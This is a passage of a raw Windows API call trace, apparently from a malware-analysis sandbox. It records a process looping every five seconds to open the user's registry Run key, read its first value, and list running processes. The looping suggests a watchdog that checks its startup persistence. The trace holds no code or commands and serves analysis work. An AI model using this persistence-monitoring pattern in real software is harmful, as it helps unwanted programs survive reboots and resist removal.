[0181.736] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.738] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.738] NtClose (Handle=0x274) returned 0x0 [0181.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.747] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.754] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.755] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.755] NtClose (Handle=0x274) returned 0x0 [0181.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.766] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.771] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.772] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.772] NtClose (Handle=0x274) returned 0x0 [0181.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.790] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.792] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.792] NtClose (Handle=0x274) returned 0x0 [0181.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.803] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.807] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.809] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.809] NtClose (Handle=0x274) returned 0x0 [0181.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.822] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.824] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.824] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.824] NtClose (Handle=0x274) returned 0x0 [0181.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.851] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.852] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.854] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.854] NtClose (Handle=0x274) returned 0x0 [0181.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.864] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.867] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.868] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.868] NtClose (Handle=0x274) returned 0x0 [0181.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.881] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.881] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.881] NtClose (Handle=0x274) returned 0x0 [0181.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.894] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.896] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.897] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.897] NtClose (Handle=0x274) returned 0x0 [0181.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.907] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.908] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.910] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.910] NtClose (Handle=0x274) returned 0x0 [0181.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.924] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.926] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.926] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.926] NtClose (Handle=0x274) returned 0x0 [0181.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.939] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.940] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.942] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.942] NtClose (Handle=0x274) returned 0x0 [0181.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.953] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.954] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.956] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.956] NtClose (Handle=0x274) returned 0x0 [0181.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 